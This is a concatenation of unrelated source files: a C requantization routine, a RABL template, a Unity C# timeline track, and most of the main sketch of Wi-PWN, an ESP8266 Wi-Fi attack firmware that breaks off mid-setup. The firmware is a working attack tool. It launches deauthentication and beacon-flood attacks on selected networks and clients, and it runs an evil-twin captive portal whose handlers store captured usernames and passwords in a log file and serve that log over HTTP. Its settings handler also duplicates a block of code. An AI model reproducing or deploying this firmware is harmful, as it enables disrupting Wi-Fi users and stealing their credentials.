// This source code is licensed under the BSD-style license found in the
// LICENSE file in the root directory of this source tree.
#include <assert.h>
#include <stdint.h>
#include <stddef.h>
#include <fp16/bitcasts.h>
#include <xnnpack/scalar-utils.h>
#include <xnnpack/requantization-stubs.h>
// Reinterpret the bits of an IEEE-754 binary32 value as a 32-bit integer.
// Union-based type punning is well-defined in C and behaves exactly like
// the fp32_to_bits() helper, without needing the fp16 header here.
static uint32_t scalar_float_as_uint32(float value) {
  union {
    float as_float;
    uint32_t as_bits;
  } pun = { .as_float = value };
  return pun.as_bits;
}

// Precise requantization of signed 32-bit accumulators to signed 8-bit values.
//
// The float scale (restricted to [2**-32, 1)) is decomposed into a 24-bit
// integer multiplier and a right-shift amount taken directly from its IEEE-754
// encoding. Each input is processed as: multiply |x| by the multiplier in
// 64-bit arithmetic, shift right with round-half-away-from-zero, restore the
// sign, clamp to [qmin - zero_point, qmax - zero_point], then add zero_point.
//
// n          - number of elements; must be a multiple of 4
// input      - n signed 32-bit accumulators
// scale      - requantization scale, 2**-32 <= scale < 1.0
// zero_point - output zero point
// qmin/qmax  - output clamping bounds
// output     - receives n signed 8-bit results, each within [qmin, qmax]
void xnn_qs8_requantize_precise__scalar_unsigned64(
    size_t n,
    const int32_t* input,
    float scale,
    int8_t zero_point,
    int8_t qmin,
    int8_t qmax,
    int8_t* output)
{
  assert(n % 4 == 0);
  assert(scale < 1.0f);
  assert(scale >= 0x1.0p-32f);

  // Split the scale into its mantissa (implicit leading 1 restored) and a
  // right-shift amount derived from the exponent field.
  const uint32_t scale_bits = scalar_float_as_uint32(scale);
  const uint32_t multiplier = (scale_bits & UINT32_C(0x007FFFFF)) | UINT32_C(0x00800000);
  const uint32_t shift = 127 + 23 - (scale_bits >> 23);
  assert(shift >= 24);
  assert(shift < 56);

  // Adding this before the shift implements round-half-up on the magnitude,
  // which becomes round-half-away-from-zero once the sign is restored.
  const uint64_t rounding = UINT64_C(1) << (shift - 1);

  // Clamping bounds in the zero-point-free domain; the zero point is added
  // only after clamping so the addition cannot overflow a signed 32-bit int.
  const int32_t smin = (int32_t) qmin - (int32_t) zero_point;
  const int32_t smax = (int32_t) qmax - (int32_t) zero_point;

  while (n != 0) {
    for (size_t i = 0; i < 4; i++) {
      const int32_t value = input[i];

      // Work on the magnitude as an unsigned number so every step below is
      // free of signed-overflow undefined behavior.
      const uint32_t abs_value = (value >= 0) ? (uint32_t) value : -(uint32_t) value;

      // Full 64-bit product of the 32-bit factors, then a right shift with
      // rounding. On processors with a "rounding right shift" instruction
      // this pair maps to a single operation (e.g. VRSHL.U64 / URSHL).
      const uint64_t product = (uint64_t) abs_value * (uint64_t) multiplier;
      const uint32_t abs_scaled = (uint32_t) ((product + rounding) >> shift);

      // Reapply the sign of the original input to the scaled magnitude.
      const int32_t scaled = (int32_t) (value >= 0 ? abs_scaled : -abs_scaled);

      // Clamp before adding the zero point.
      int32_t clamped = scaled;
      if (clamped < smin) {
        clamped = smin;
      }
      if (clamped > smax) {
        clamped = smax;
      }

      // The result is guaranteed to lie in [qmin, qmax].
      output[i] = (int8_t) (clamped + zero_point);
    }
    input += 4;
    output += 4;
    n -= 4;
  }
}
| {
"pile_set_name": "Github"
} |
# RABL attribute declarations: expose the record's own fields in the response.
attribute :id
attribute :public_address
attribute :created_at
attribute :balance
child(:issue) {
attribute :id
attribute :title
attribute :to_param => :slug
} | {
"pile_set_name": "Github"
} |
using UnityEngine;
using UnityEngine.Playables;
using UnityEngine.Timeline;
using UnityEngine.Experimental.VFX;
/// <summary>
/// Timeline track that holds <c>VisualEffectActivationClip</c> clips and is
/// bound to a <c>VisualEffect</c> scene object.
/// </summary>
[TrackColor(0.5990566f, 0.9038978f, 1f)]
[TrackClipType(typeof(VisualEffectActivationClip))]
[TrackBindingType(typeof(VisualEffect))]
public class VisualEffectActivationTrack : TrackAsset
{
    /// <summary>Creates the mixer playable that blends all clips on this track.</summary>
    public override Playable CreateTrackMixer(PlayableGraph graph, GameObject go, int inputCount)
    {
        var mixer = ScriptPlayable<VisualEffectActivationMixerBehaviour>.Create(graph, inputCount);
        return mixer;
    }
}
| {
"pile_set_name": "Github"
} |
/*
(*********************************************************************
* ____ ____ _ _______ ____ ____ ____ _____ *
* |_ _| |_ _|(_) |_ __ \|_ _| |_ _||_ \|_ _| *
* \ \ /\ / / __ ______ | |__) | \ \ /\ / / | \ | | *
* \ \/ \/ / [ ||______|| ___/ \ \/ \/ / | |\ \| | *
* \ /\ / | | _| |_ \ /\ / _| |_\ |_ *
* \/ \/ [___] |_____| \/ \/ |_____|\____| *
* *
***********************************************************************
* https://github.com/samdenty99/Wi-PWN *
* *
* (c) 2017 Sam Denty *
* https://samdd.me/projects *
* *
*---------------------------------------------------------------------*
* Wi-PWN is based on spacehuhn/esp8266_deauther *
* (c) Stefan Kremser *
**********************************************************************
*/
// Including some libraries we need //
#include <Arduino.h>
#include <ESP8266WiFi.h>
#include <ESP8266WebServer.h>
#include <FS.h>
#include <ESP8266HTTPUpdateServer.h>
#include <WiFiClient.h>
// Settings //
//#define USE_DISPLAY /* <-- uncomment that if you want to use the display */
#define GPIO0_DEAUTH_BUTTON /* <-- Enable using GPIO0 (Flash button on NodeMCUs) as a deauth attack toggle (CAN LEAD TO LED BLINKING BUG!)*/
#define resetPin 4 /* <-- comment out or change if you need GPIO 4 for other purposes */
//#define USE_LED16 /* <-- for the Pocket ESP8266 which has a LED on GPIO 16 to indicate if it's running */
//#define USE_CAPTIVE_PORTAL /* <-- enable captive portal (redirects all pages to 192.168.4.1), Wi-PWN page is available on /wipwn, passwords are accessed using /wipwn.log */
// Evil Twin with Captive Portal //
#ifdef USE_CAPTIVE_PORTAL
#include "./DNSServer.h" // Patched lib
#endif
// Including everything for the OLED //
#ifdef USE_DISPLAY
#include <Wire.h>
//include the library you need
#include "SSD1306.h"
#include "SH1106.h"
//create display(Adr, SDA-pin, SCL-pin)
SSD1306 display(0x3c, 5, 4); //GPIO 5 = D1, GPIO 4 = D2
//SH1106 display(0x3c, 5, 4);
//button pins
#define upBtn 12 //GPIO 12 = D6
#define downBtn 13 //GPIO 13 = D7
#define selectBtn 14 //GPIO 14 = D5
#define displayBtn 0 //GPIO 0 = FLASH BUTTON
//render settings
#define fontSize 8
#define rowsPerSite 8
int rows = 4;
int curRow = 0;
int sites = 1;
int curSite = 1;
int lrow = 0;
int menu = 0; //0 = Main Menu, 1 = APs, 2 = Stations, 3 = Attacks, 4 = Monitor
bool canBtnPress = true;
int buttonPressed = 0; //0 = UP, 1 = DOWN, 2 = SELECT, 3 = DISPLAY
bool displayOn = true;
#endif
// More Includes! //
extern "C" {
#include "user_interface.h"
}
#ifdef USE_CAPTIVE_PORTAL
const byte DNS_PORT = 53; // Capture DNS requests on port 53
IPAddress apIP(192, 168, 4, 1); // IP Address for Wi-PWN (Changing this will cause unwanted side effects - app malfunctioning)
DNSServer dnsServer; // Create the DNS object
#endif
ESP8266WebServer server(80); // HTTP server
ESP8266HTTPUpdateServer httpUpdater; // OTA Update server
#include <EEPROM.h>
#include "data.h"
#include "NameList.h"
#include "APScan.h"
#include "ClientScan.h"
#include "Attack.h"
#include "Settings.h"
#include "SSIDList.h"
/* ========== DEBUG ========== */
const bool debug = true;
/* ========== DEBUG ========== */
// Run-Time Variables //
String wifiMode = "";
String attackMode_deauth = "";
String attackMode_beacon = "";
String scanMode = "SCAN";
// Deauth detector
bool detecting = false;
unsigned long dC = 0;
unsigned long prevTime = 0;
unsigned long curTime = 0;
int curChannel = settings.detectorChannel;
NameList nameList;
APScan apScan;
ClientScan clientScan;
Attack attack;
Settings settings;
SSIDList ssidList;
// Promiscuous-mode RX callback registered with the SDK: hands every captured
// 802.11 frame to the client scanner.
void sniffer(uint8_t *buf, uint16_t len) {
  clientScan.packetSniffer(buf, len);
}
#ifdef USE_DISPLAY
// Renders the OLED menu. The first four logical rows are fixed status/action
// entries; rows from index 4 onward list scanned access points. Pagination is
// driven by curSite/rowsPerSite, and lrow marks the highlighted cursor row.
void drawInterface() {
  if(displayOn){
    display.clear();
    int _lrow = 0;  // physical row on the display for the current page
    // Iterate only over the logical rows belonging to the visible page.
    for (int i = curSite * rowsPerSite - rowsPerSite; i < curSite * rowsPerSite; i++) {
      if (i == 0) display.drawString(3, i * fontSize, "-> WiFi " + wifiMode);
      else if (i == 1) display.drawString(3, i * fontSize, "-> " + scanMode);
      else if (i == 2) display.drawString(3, i * fontSize, "-> " + attackMode_deauth + " deauth");
      else if (i == 3) display.drawString(3, i * fontSize, "-> " + attackMode_beacon + " beacon flood");
      else if (i - 4 < apScan.results) {
        // AP entries start at logical row 4; selected APs get a two-pixel
        // vertical marker near the left edge.
        display.drawString(4, _lrow * fontSize, apScan.getAPName(i - 4));
        if (apScan.isSelected(i - 4)) {
          display.drawVerticalLine(1, _lrow * fontSize, fontSize);
          display.drawVerticalLine(2, _lrow * fontSize, fontSize);
        }
      }
      // Cursor indicator at column 0 for the highlighted row.
      if (_lrow == lrow) display.drawVerticalLine(0, _lrow * fontSize, fontSize);
      _lrow++;
    }
    display.display();
  }
}
#endif
// Brings up the soft-AP using the stored settings, optionally joins an
// upstream WiFi network in station mode, then reports status over Serial.
// Also (re)starts the captive-portal DNS server when that feature is enabled.
void startWifi() {
  Serial.println("\nStarting WiFi AP:");
  // AP+STA mode: host our own network while still being able to sniff/connect.
  WiFi.mode(WIFI_AP_STA);
  wifi_set_promiscuous_rx_cb(sniffer);
#ifdef USE_CAPTIVE_PORTAL
  WiFi.softAPConfig(apIP, apIP, IPAddress(255, 255, 255, 0));
#endif
  WiFi.softAP((const char*)settings.ssid.c_str(), (const char*)settings.password.c_str(), settings.apChannel, settings.ssidHidden); //for an open network without a password change to: WiFi.softAP(ssid);
  // Optional upstream connection (client mode).
  // NOTE(review): `settings.ssidClient` is used here in a boolean context —
  // presumably intended to test for a non-empty SSID; confirm that String's
  // bool conversion on this core actually reflects emptiness.
  if (settings.wifiClient && settings.ssidClient) {
    Serial.print("Connecting to WiFi network '"+settings.ssidClient+"' using the password '"+settings.passwordClient+"' ");
    if (settings.hostname) WiFi.hostname(settings.hostname);
    WiFi.begin((const char*)settings.ssidClient.c_str(), (const char*)settings.passwordClient.c_str());
    int conAtt = 0;  // connection attempts, one every 500 ms
    while (WiFi.status() != WL_CONNECTED) {
      delay(500);
      Serial.print(".");
      conAtt++;
      if (conAtt > 30) {  // give up after ~15 seconds
        Serial.println("");
        Serial.println("Failed to connect to '"+settings.ssidClient+"', skipping connection\n");
        goto startWifi;  // jump past the connection report below
      }
    }
    Serial.println(" connected!");
    Serial.print("IP address: ");
    Serial.println(WiFi.localIP());
    Serial.print("Netmask: ");
    Serial.println(WiFi.subnetMask());
    Serial.print("Gateway: ");
    Serial.println(WiFi.gatewayIP());
    Serial.println("");
  }
// Label shares the function's name (labels live in a separate namespace);
// only targeted by the bail-out goto above.
startWifi:
  Serial.println("SSID : '" + settings.ssid+"'");
  Serial.println("Password : '" + settings.password+"'");
#ifdef USE_CAPTIVE_PORTAL
  // Captive portal DNS only runs once first-time setup has completed.
  if (settings.newUser == 0) {
    dnsServer.start(DNS_PORT, "*", apIP);
    Serial.println("Captive Portal: Running");
  } else {Serial.println("Captive Portal: Stopped");}
#endif
  if (settings.newUser == 1) {Serial.println("Redirecting to setup page");}
  Serial.println("-----------------------------------------------");
  // Warn (but don't refuse) when AP credentials violate 802.11 constraints.
  if (settings.password.length() < 8) Serial.println("WARNING: password must have at least 8 characters!");
  if (settings.ssid.length() < 1 || settings.ssid.length() > 32) Serial.println("WARNING: SSID length must be between 1 and 32 characters!");
  wifiMode = "ON";
}
// Shuts down the soft-AP / client connection and drops back to plain station
// mode; updates the status string shown on the web UI and OLED.
void stopWifi() {
  Serial.println("stopping WiFi AP");
  Serial.println("-----------------------------------------------");
  WiFi.disconnect();
  wifi_set_opmode(STATION_MODE);
  wifiMode = "OFF";
}
// ---- HTTP handlers: HTML pages (served from PROGMEM via sendFile) ----

// First-run setup page; sent with no-cache headers so a completed setup is
// never replayed from the browser cache.
void loadSetupHTML() {
  server.sendHeader("Cache-Control", "no-cache, no-store, must-revalidate");
  server.sendHeader("Pragma", "no-cache");
  server.sendHeader("Expires", "0");
  sendFile(200, "text/html", data_setup_HTML, sizeof(data_setup_HTML), true);
}

// Main scan/overview page.
void loadIndexHTML() {
  sendFile(200, "text/html", data_index_HTML, sizeof(data_index_HTML), false);
}

// Saved-clients (name list) page.
void loadUsersHTML() {
  sendFile(200, "text/html", data_users_HTML, sizeof(data_users_HTML), false);
}

// Attack page; flags ssidChange so the attack's SSID list is rebuilt.
void loadAttackHTML() {
  attack.ssidChange = true;
  sendFile(200, "text/html", data_attack_HTML, sizeof(data_attack_HTML), false);
}

// Deauth-detector page.
void loadDetectorHTML() {
  sendFile(200, "text/html", data_detector_HTML, sizeof(data_detector_HTML), false);
}

// Hardware-control page.
void loadControlHTML() {
  sendFile(200, "text/html", data_control_HTML, sizeof(data_control_HTML), false);
}

// Settings page.
void loadSettingsHTML() {
  sendFile(200, "text/html", data_settings_HTML, sizeof(data_settings_HTML), false);
}

// Not-found page (HTTP 404).
void load404() {
  sendFile(404, "text/html", data_404_HTML, sizeof(data_404_HTML), false);
}

// Device/firmware info page.
void loadInfoHTML(){
  sendFile(200, "text/html", data_info_HTML, sizeof(data_info_HTML), false);
}
void loadScanJS() {
sendFile(200, "text/javascript", data_scan_JS, sizeof(data_scan_JS), false);
}
void loadUsersJS() {
sendFile(200, "text/javascript", data_users_JS, sizeof(data_users_JS), false);
}
void loadAttackJS() {
attack.ssidChange = true;
sendFile(200, "text/javascript", data_attack_JS, sizeof(data_attack_JS), false);
}
void loadDetectorJS() {
sendFile(200, "text/javascript", data_detector_JS, sizeof(data_detector_JS), false);
}
// Serve the embedded control-page script.
void loadControlJS() {
  sendFile(200, "text/javascript", data_control_JS, sizeof(data_control_JS), false);
}
// Serve the embedded settings-page script.
void loadSettingsJS() {
  sendFile(200, "text/javascript", data_settings_JS, sizeof(data_settings_JS), false);
}
// Serve the embedded info-page script.
void loadInfoJS() {
  sendFile(200, "text/javascript", data_info_JS, sizeof(data_info_JS), false);
}
// Serve the shared helper script used by every page.
void loadFunctionsJS() {
  sendFile(200, "text/javascript", data_functions_JS, sizeof(data_functions_JS), false);
}
// Serve the main stylesheet.
void loadStyle() {
  sendFile(200, "text/css;charset=UTF-8", data_main_CSS, sizeof(data_main_CSS), false);
}
// Serve dark.css when dark mode is enabled; otherwise reply with an
// effectively empty stylesheet so the page renders with the light theme.
void loadDarkMode() {
  if (!settings.darkMode) {
    server.send(200, "text/css", "/* Dark mode disabled */");
    return;
  }
  sendFile(200, "text/css;charset=UTF-8", data_dark_CSS, sizeof(data_dark_CSS), true);
}
// Serve dark.css unconditionally (used by the first-run setup page).
void loadDarkModeForce() {
  sendFile(200, "text/css;charset=UTF-8", data_dark_CSS, sizeof(data_dark_CSS), true);
}
// Bounce the client to the AP's root page via an instant meta refresh.
// Fix: the original markup was missing the space between the content
// attribute's closing quote and "http-equiv", producing invalid HTML that
// some browsers refuse to honor.
void loadRedirectHTML() {
  server.send(302, "text/html", "<meta content='0; url=http://192.168.4.1' http-equiv='refresh'>");
}
#ifdef USE_CAPTIVE_PORTAL
// Stream the captive-portal page straight from PROGMEM, with caching and
// content-encoding disabled so intercepting clients always see it fresh.
void loadCaptiveHTML() {
  server.sendHeader("Cache-Control", "no-cache, no-store, must-revalidate");
  server.sendHeader("Pragma", "no-cache");
  server.sendHeader("Expires", "0");
  server.sendHeader("Content-Encoding", "identity");
  server.sendContent_P((char *)data_CaptiveHTML, sizeof(data_CaptiveHTML));
  sendBuffer();
}
// Append a captured credential pair to the SPIFFS log.
// Fixes: the File handle was never closed (handle leak / unflushed data),
// and the write was attempted even when opening the file had failed.
void saveCaptiveData(String user, String passwd) {
  File file = SPIFFS.open("/wipwn.log", "a");
  if (!file) {
    Serial.println("File open failed");
    return; // nothing to write to
  }
  file.println("[" + settings.ssid + "] " + user + ":" + passwd + "<br>");
  file.close(); // flush and release the handle
}
// Read the captured-credentials log from SPIFFS, echo it to serial, and
// return it to the browser. On a failed open an empty body is sent, which
// matches the original behavior.
// Fixes: the File handle was never closed, and reads were attempted on an
// invalid handle when the open failed.
void readCaptiveData() {
  String line;
  File file = SPIFFS.open("/wipwn.log", "r");
  if (!file) {
    Serial.println("file open failed");
  } else {
    Serial.println("====== Reading from SPIFFS file =======");
    while (file.available()) line += file.readStringUntil('\n');
    file.close(); // release the handle
  }
  Serial.println(line);
  server.send(200, "text/html", line);
}
#endif
// Toggle the access point on or off and forget any previously scanned
// clients, since they belong to the old radio session.
void startWiFi(bool start) {
  if (start) {
    startWifi();
  } else {
    stopWifi();
  }
  clientScan.clearList();
}
//==========AP-Scan==========
// Run a blocking access-point scan, acknowledge it to the web client, and
// stop any running attacks (their targets may no longer exist).
void startAPScan() {
scanMode = "scanning...";
#ifdef USE_DISPLAY
drawInterface();
#endif
if (apScan.start()) {
#ifdef USE_DISPLAY
// Recompute display paging: 4 fixed menu rows plus one row per AP found.
apScan.sort();
rows = 4;
rows += apScan.results;
sites = rows / rowsPerSite;
if (rows % rowsPerSite > 0) sites++;
#endif
server.send ( 200, "text/json", "true");
attack.stopAll();
scanMode = "SCAN";
}
}
// Forward the latest AP scan results to the web client.
void sendAPResults() {
  apScan.sendResults();
}
// Toggle selection of the access point at index "num".
void selectAP() {
  if (!server.hasArg("num")) return;
  apScan.select(server.arg("num").toInt());
  server.send(200, "text/json", "true");
  attack.stopAll(); // NOTE: scheduled for removal in a future update
}
//==========Client-Scan==========
// Begin sniffing for clients for the requested duration, but only when a
// target network is selected and no scan is already running.
void startClientScan() {
  bool ready = server.hasArg("time") && apScan.getFirstTarget() > -1 && !clientScan.sniffing;
  if (ready) {
    server.send(200, "text/json", "true");
    clientScan.start(server.arg("time").toInt());
    attack.stopAll();
  } else {
    server.send(200, "text/json", "ERROR: No selected Wi-Fi networks!");
  }
}
// Forward the latest client scan results to the web client.
void sendClientResults() {
  clientScan.send();
}
// Report the configured client scan duration as JSON.
void sendClientScanTime() {
  server.send(200, "text/json", (String)settings.clientScanTime);
}
// Toggle selection of client "num" and stop a running deauth attack, since
// its victim set just changed.
void selectClient() {
  if (!server.hasArg("num")) return;
  clientScan.select(server.arg("num").toInt());
  attack.stop(0);
  server.send(200, "text/json", "true");
}
// Add the saved client at index "num" to the active client list.
void addClientFromList() {
  if (!server.hasArg("num")) {
    server.send(200, "text/json", "false");
    return;
  }
  clientScan.add(nameList.getMac(server.arg("num").toInt()));
  server.send(200, "text/json", "true");
}
// Assign a display name to a scanned client; empty names are rejected.
void setClientName() {
  if (server.hasArg("id") && server.hasArg("name")) {
    bool ok = server.arg("name").length() > 0;
    if (ok) nameList.add(clientScan.getClientMac(server.arg("id").toInt()), server.arg("name"));
    server.send(200, "text/json", ok ? "true" : "false");
  }
}
// Delete the saved name entry at index "num".
void deleteName() {
  if (!server.hasArg("num")) {
    server.send(200, "text/json", "false");
    return;
  }
  nameList.remove(server.arg("num").toInt());
  server.send(200, "text/json", "true");
}
// Remove every saved name entry.
void clearNameList() {
  nameList.clear();
  server.send(200, "text/json", "true");
}
// Rename the saved entry at index "id".
void editClientName() {
  if (!(server.hasArg("id") && server.hasArg("name"))) {
    server.send(200, "text/json", "false");
    return;
  }
  nameList.edit(server.arg("id").toInt(), server.arg("name"));
  server.send(200, "text/json", "true");
}
// Add a client with a user-supplied MAC address and name to the name list.
// Fixes: the length check "< 12 || > 12" is simplified to "!= 12", and the
// hex parsing no longer stores a c_str() pointer obtained from a temporary
// String (the temporary is destroyed at the end of the full expression, so
// the stored pointer was dangling when strtoul read it).
void addClient() {
  if (server.hasArg("mac") && server.hasArg("name")) {
    String macStr = server.arg("mac");
    macStr.replace(":", "");
    Serial.println("add " + macStr + " - " + server.arg("name"));
    // A MAC must be exactly 12 hex digits once the colons are stripped.
    if (macStr.length() != 12) {
      server.send(200, "text/json", "false");
    } else {
      Mac _newClient;
      for (int i = 0; i < 6; i++) {
        // Parse each byte within a single expression so the temporary
        // String returned by substring() is still alive during strtoul().
        uint8_t valByte = (uint8_t)strtoul(macStr.substring(i * 2, i * 2 + 2).c_str(), NULL, 16);
        Serial.print(valByte, HEX);
        Serial.print(":");
        _newClient.setAt(valByte, i);
      }
      Serial.println();
      nameList.add(_newClient, server.arg("name"));
      server.send(200, "text/json", "true");
    }
  }
}
//==========Attack==========
// Report the current attack status to the web client.
void sendAttackInfo() {
  attack.sendResults();
}
void startAttack() {
if (server.hasArg("num")) {
int _attackNum = server.arg("num").toInt();
if (apScan.getFirstTarget() > -1 || _attackNum == 1 || _attackNum == 2) {
attack.start(server.arg("num").toInt());
server.send ( 200, "text/json", "true");
} else server.send( 200, "text/json", "false");
}
}
void addSSID() {
if(server.hasArg("ssid") && server.hasArg("num") && server.hasArg("enc")){
int num = server.arg("num").toInt();
if(num > 0){
ssidList.addClone(server.arg("ssid"),num, server.arg("enc") == "true");
}else{
ssidList.add(server.arg("ssid"), server.arg("enc") == "true" || server.arg("enc") == "1");
}
attack.ssidChange = true;
server.send( 200, "text/json", "true");
} else server.send( 200, "text/json", "false");
}
// Replace the SSID list with clones of every selected network, splitting
// the 48 available beacon slots evenly between them.
void cloneSelected() {
  if (apScan.selectedSum > 0) {
    int perSSID = 48 / apScan.selectedSum;
    ssidList.clear();
    for (int i = 0; i < apScan.results; i++) {
      if (!apScan.isSelected(i)) continue;
      ssidList.addClone(apScan.getAPName(i), perSSID, apScan.getAPEncryption(i) != "none");
    }
  }
  attack.ssidChange = true;
  server.send(200, "text/json", "true");
}
// Remove the SSID at index "num" from the beacon list.
void deleteSSID() {
  ssidList.remove(server.arg("num").toInt());
  attack.ssidChange = true;
  server.send(200, "text/json", "true");
}
// Fill the SSID list with randomly generated names.
void randomSSID() {
  ssidList._random();
  attack.ssidChange = true;
  server.send(200, "text/json", "true");
}
// Empty the SSID list.
void clearSSID() {
  ssidList.clear();
  attack.ssidChange = true;
  server.send(200, "text/json", "true");
}
// Discard unsaved edits by reloading the SSID list from storage.
void resetSSID() {
  ssidList.load();
  attack.ssidChange = true;
  server.send(200, "text/json", "true");
}
// Mark the SSID list dirty so the client re-fetches it.
void reloadSSID() {
  attack.ssidChange = true;
  server.send(200, "text/json", "true");
}
// Persist the current SSID list.
void saveSSID() {
  ssidList.save();
  server.send(200, "text/json", "true");
}
// Acknowledge the request, then reboot the chip.
void restartESP() {
  server.send(200, "text/json", "true");
  ESP.restart();
}
// Enable/adjust the random-SSID rotation interval (seconds).
void enableRandom() {
  server.send(200, "text/json", "true");
  attack.changeRandom(server.arg("interval").toInt());
}
// Switch the radio into promiscuous station mode and start counting
// deauth/disassoc frames via the dSniffer callback on the current channel.
void startDetector() {
  Serial.println("Starting Deauth Detector in 1 second...");
  server.send(200, "text/json", "true");
  delay(1000); // TODO: replace this blocking delay
  wifi_set_opmode(STATION_MODE);
  wifi_promiscuous_enable(0); // must be off while changing the callback
  WiFi.disconnect();
  wifi_set_promiscuous_rx_cb(dSniffer);
  wifi_set_channel(curChannel);
  wifi_promiscuous_enable(1);
  pinMode(settings.alertPin, OUTPUT);
  detecting = true;
}
// Promiscuous-mode callback: count frames whose type/subtype byte marks a
// disassociation (0xA0) or deauthentication (0xC0) frame.
void dSniffer(uint8_t *buf, uint16_t len) {
  uint8_t frameType = buf[12];
  if (frameType == 0xA0 || frameType == 0xC0) dC++;
}
//==========Settings==========
// Send the current settings to the web client.
void getSettings() {
  settings.send();
}
// Send system information to the web client.
void getSysInfo() {
  settings.sendSysInfo();
}
void saveSettings() {
server.send( 200, "text/json", "true" );
if (server.hasArg("ssid")) settings.ssid = server.arg("ssid");
if (server.hasArg("ssidHidden")) {
if (server.arg("ssidHidden") == "false") settings.ssidHidden = false;
else settings.ssidHidden = true;
}
if (server.hasArg("password")) settings.password = server.arg("password");
if (server.hasArg("apChannel")) {
if (server.arg("apChannel").toInt() >= 1 && server.arg("apChannel").toInt() <= 14) {
settings.apChannel = server.arg("apChannel").toInt();
}
}
if (server.hasArg("wifiClient")) {
if (server.arg("wifiClient") == "false") settings.wifiClient = false;
else settings.wifiClient = true;
}
if (server.hasArg("ssidClient")) settings.ssidClient = server.arg("ssidClient");
if (server.hasArg("passwordClient")) settings.passwordClient = server.arg("passwordClient");
if (server.hasArg("hostname")) settings.hostname = server.arg("hostname");
if (server.hasArg("macAp")) {
String macStr = server.arg("macAp");
macStr.replace(":","");
Mac tempMac;
if(macStr.length() == 12){
for(int i=0;i<6;i++){
const char* val = macStr.substring(i*2,i*2+2).c_str();
uint8_t valByte = strtoul(val, NULL, 16);
tempMac.setAt(valByte,i);
}
if(tempMac.valid()) settings.macAP.set(tempMac);
} else if(macStr.length() == 0){
settings.macAP.set(settings.defaultMacAP);
}
}
if (server.hasArg("randMacAp")) {
if (server.arg("randMacAp") == "false") settings.isMacAPRand = false;
else settings.isMacAPRand = true;
}
if (server.hasArg("macAp")) {
String macStr = server.arg("macAp");
macStr.replace(":","");
Mac tempMac;
if(macStr.length() == 12){
for(int i=0;i<6;i++){
const char* val = macStr.substring(i*2,i*2+2).c_str();
uint8_t valByte = strtoul(val, NULL, 16);
tempMac.setAt(valByte,i);
}
if(tempMac.valid()) settings.macAP.set(tempMac);
} else if(macStr.length() == 0){
settings.macAP.set(settings.defaultMacAP);
}
}
if (server.hasArg("randMacAp")) {
if (server.arg("randMacAp") == "false") settings.isMacAPRand = false;
else settings.isMacAPRand = true;
}
if (server.hasArg("scanTime")) settings.clientScanTime = server.arg("scanTime").toInt();
if (server.hasArg("timeout")) settings.attackTimeout = server.arg("timeout").toInt();
if (server.hasArg("deauthReason")) settings.deauthReason = server.arg("deauthReason").toInt();
if (server.hasArg("packetRate")) settings.attackPacketRate = server.arg("packetRate").toInt();
if (server.hasArg("apScanHidden")) {
if (server.arg("apScanHidden") == "false") settings.apScanHidden = false;
else settings.apScanHidden = true;
}
if (server.hasArg("beaconInterval")) {
if (server.arg("beaconInterval") == "false") settings.beaconInterval = false;
else settings.beaconInterval = true;
}
if (server.hasArg("useLed")) {
if (server.arg("useLed") == "false") settings.useLed = false;
else settings.useLed = true;
attack.refreshLed();
}
if (server.hasArg("channelHop")) {
if (server.arg("channelHop") == "false") settings.channelHop = false;
else settings.channelHop = true;
}
if (server.hasArg("multiAPs")) {
if (server.arg("multiAPs") == "false") settings.multiAPs = false;
else settings.multiAPs = true;
}
if (server.hasArg("multiAttacks")) {
if (server.arg("multiAttacks") == "false") settings.multiAttacks = false;
else settings.multiAttacks = true;
}
if (server.hasArg("ledPin")) settings.setLedPin(server.arg("ledPin").toInt());
if(server.hasArg("macInterval")) settings.macInterval = server.arg("macInterval").toInt();
if (server.hasArg("darkMode")) {
if (server.arg("darkMode") == "false") {
settings.darkMode = false;
} else {
settings.darkMode = true;
}
}
if (server.hasArg("cache")) {
if (server.arg("cache") == "false") settings.cache = false;
else settings.cache = true;
}
if (server.hasArg("serverCache")) settings.serverCache = server.arg("serverCache").toInt();
if (server.hasArg("newUser")) {
if (server.arg("newUser") == "false") settings.newUser = false;
else settings.newUser = true;
}
if (server.hasArg("detectorChannel")) settings.detectorChannel = server.arg("detectorChannel").toInt();
if (server.hasArg("detectorAllChannels")) {
if (server.arg("detectorAllChannels") == "false") settings.detectorAllChannels = false;
else settings.detectorAllChannels = true;
}
if (server.hasArg("alertPin")) settings.alertPin = server.arg("alertPin").toInt();
if (server.hasArg("invertAlertPin")) {
if (server.arg("invertAlertPin") == "false") settings.invertAlertPin = false;
else settings.invertAlertPin = true;
}
if (server.hasArg("detectorScanTime")) settings.detectorScanTime = server.arg("detectorScanTime").toInt();
if (server.hasArg("pinNames")) settings.pinNames = server.arg("pinNames");
if (server.hasArg("pins")) settings.pins = server.arg("pins");
settings.save();
}
// Restore factory-default settings.
void resetSettings() {
  settings.reset();
  server.send(200, "text/json", "true");
}
// Arduino entry point: initialize peripherals and storage, bring up the AP,
// and register all HTTP routes. Route sets differ for first-run ("newUser"),
// normal operation, and the optional captive portal build.
void setup() {
randomSeed(os_random());
#ifdef USE_LED16
pinMode(16, OUTPUT);
digitalWrite(16, LOW);
#endif
Serial.begin(115200);
attackMode_deauth = "START";
attackMode_beacon = "START";
// Load persisted state: settings, saved client names and the SSID list.
EEPROM.begin(4096);
SPIFFS.begin();
settings.load();
if (debug) settings.info();
settings.syncMacInterface();
nameList.load();
ssidList.load();
attack.refreshLed();
delay(500); // Prevent bssid leak
startWifi();
attack.stopAll();
attack.generate();
/* ========== Web Server ========== */
if (settings.newUser == 1) {
/* Load certain files (only if newUser) */
// First-run mode: everything except the setup page redirects back to it.
server.onNotFound(loadRedirectHTML);
server.on("/js/functions.js", loadFunctionsJS);
server.on("/main.css", loadStyle);
server.on("/", loadSetupHTML);
server.on("/index.html", loadSetupHTML);
server.on("/dark.css", loadDarkModeForce);
server.on("/ClientScanTime.json", sendClientScanTime);
server.on("/settingsSave.json", saveSettings);
server.on("/restartESP.json", restartESP);
server.on("/settingsReset.json", resetSettings);
} else {
/* Redirects */
#ifndef USE_CAPTIVE_PORTAL
server.on("/index.html", loadIndexHTML);
#endif
server.on("/users.html", loadUsersHTML);
server.on("/attack.html", loadAttackHTML);
server.on("/detector.html", loadDetectorHTML);
server.on("/control.html", loadControlHTML);
server.on("/settings.html", loadSettingsHTML);
server.on("/info.html", loadInfoHTML);
/* HTML */
#ifndef USE_CAPTIVE_PORTAL
server.onNotFound(load404);
server.on("/", loadIndexHTML);
#endif
server.on("/users", loadUsersHTML);
server.on("/attack", loadAttackHTML);
server.on("/detector", loadDetectorHTML);
server.on("/control", loadControlHTML);
server.on("/settings", loadSettingsHTML);
